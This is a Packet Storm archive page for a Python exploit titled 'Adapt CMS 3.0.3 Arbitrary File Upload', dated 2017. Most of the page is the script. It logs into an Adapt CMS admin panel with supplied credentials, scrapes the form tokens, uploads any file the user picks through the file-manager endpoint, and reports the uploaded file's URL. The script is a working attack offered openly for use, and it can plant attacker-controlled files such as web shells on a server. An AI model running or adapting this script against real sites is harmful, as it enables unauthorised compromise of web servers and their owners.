exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Adapt CMS 3.0.3 File Upload

Adapt CMS 3.0.3 File Upload
Posted Jan 29, 2017
Authored by Amir.ght

Adapt CMS version 3.0.3 suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
SHA-256 | c44033e3a2176c341b0fe6f40200156bef794de837cd53597e046b504c6f3c89

Adapt CMS 3.0.3 File Upload

Change Mirror Download

#!usr/bin/python
"""
| Exploit Title: Adapt Cms Arbitrary File Upload
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.adaptcms.com/
|
| Download Link : http://www.adaptcms.com/downloads/latest_adaptcms.zip
|
| Tested Version : AdaptCMS 3.0.3
|
| Tested on: Windows 7 / Mozilla Firefox
|
| Date: 2017-01-22
"""
import requests,os,sys
from bs4 import BeautifulSoup
error=""
def banner_print(error):
banner="""
_______________________________________________________________________________________
_ _ _____ _ _ _ _
/\ | | (_) | __ \(_) (_) | | |
/ \ ___| |__ _ _ _ __ _ _ __ ___ | | | |_ __ _ _| |_ __ _| |
/ /\ \ / __| '_ \| | | | |/ _` | '_ \ / _ \ | | | | |/ _` | | __/ _` | |
/ ____ \\__ \ | | | | |_| | (_| | | | | __/ | |__| | | (_| | | || (_| | |
/_/ \_\___/_| |_|_|\__, |\__,_|_| |_|\___| |_____/|_|\__, |_|\__\__,_|_|
__/ | __/ |
|___/ |___/
_____ _ _ _______
/ ____| (_) | |__ __|
| (___ ___ ___ _ _ _ __ _| |_ _ _ | | ___ __ _ _ __ ___
\___ \ / _ \/ __| | | | '__| | __| | | | | |/ _ \/ _` | '_ ` _ \
____) | __/ (__| |_| | | | | |_| |_| | | | __/ (_| | | | | | |
|_____/ \___|\___|\__,_|_| |_|\__|\__, | |_|\___|\__,_|_| |_| |_|
__/ |
|___/

\ / _._|_ _ _| |_ /\ _ _ . _ _ |_ _|_
\/\/ | | | (/_(_| |_)\/ /~~\| | ||| .(_|| | |
/ _| |
____________________________________________________________________________________

\t%s
\t Usage : python exploit.py site username_of_admin password_of_admin
\t example : python exploit.py http://example.com admin 12345
"""%(error)
print banner
banner_print(error)
http=requests.session()
class adapt_exploit:
def __init__(self,url,user,passwd,file):
self.url=url
self.user=user
self.passwd=passwd
self.file=file
def login(self):
req=http.get(url+'/login')
soup=BeautifulSoup(req.content,"html.parser")
token1=soup.find_all('input',{'type':'hidden','name':'data[_Token][key]'})[0].get('value')
token2=soup.find_all('input',{'type':'hidden','name':'data[_Token][fields]'})[1].get('value')
print '\n[+] The token for login was received successfully.\n'
data={'_method':'POST',
'data[_Token][key]':token1,
'data[User][username]':self.user,
'data[User][password]':self.passwd,
'data[_Token][fields]':token2}
req=http.post(url+'/login',data=data)
if 'success' in req.content.lower():
print '[+] Login success\n'
else:
print '[!] Login Failed\n'
exit()
def upload(self):
req=http.get(url+'/admin/files/add')
soup=BeautifulSoup(req.content,"html.parser")
token1=soup.find('input',{'type':'hidden','name':'data[_Token][key]'}).get('value')
token2=soup.find('input',{'type':'hidden','name':'data[_Token][fields]'}).get('value')
print '[+] The token for login was received successfully.\n'
path=raw_input('Please enter path file that you want upload ...\n')
path=path.replace('"','')
path=path.replace('\'','')
f=open(path,'rb')
file= {'data[File][filename]' : f}
data={'_method':'POST',
'data[_Token][key]':token1,
'data[_Token][fields]':token2,
'data[File][type]':'upload',
'data[File][0][random_filename]':'0'
}
req=http.post(url+'/admin/files/add',data=data,files=file)
check=http.get('%s/uploads/'%(url))
file_name=os.path.basename(f.name).replace(' ','_')
if file_name in check.content:
print "[+] File upload was successful\n"
print "URL Of File : %s/upload/%s"%(url,file_name)
else:
print "\n[-] Failed to upload file "
try :
url=sys.argv[1]
user=sys.argv[2]
passwd=sys.argv[3]
expl=adapt_exploit(url,user,passwd,file)
expl.login()
expl.upload()
except IndexError as e:
if 'nt' in os.name :
os.system('cls')
else:
os.system('clear')
error="Invalid Usage !"
banner_print(error)
except Exception as e:
print "oops !!!\n Some Thing is Wrong :(( "
print str(e)
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close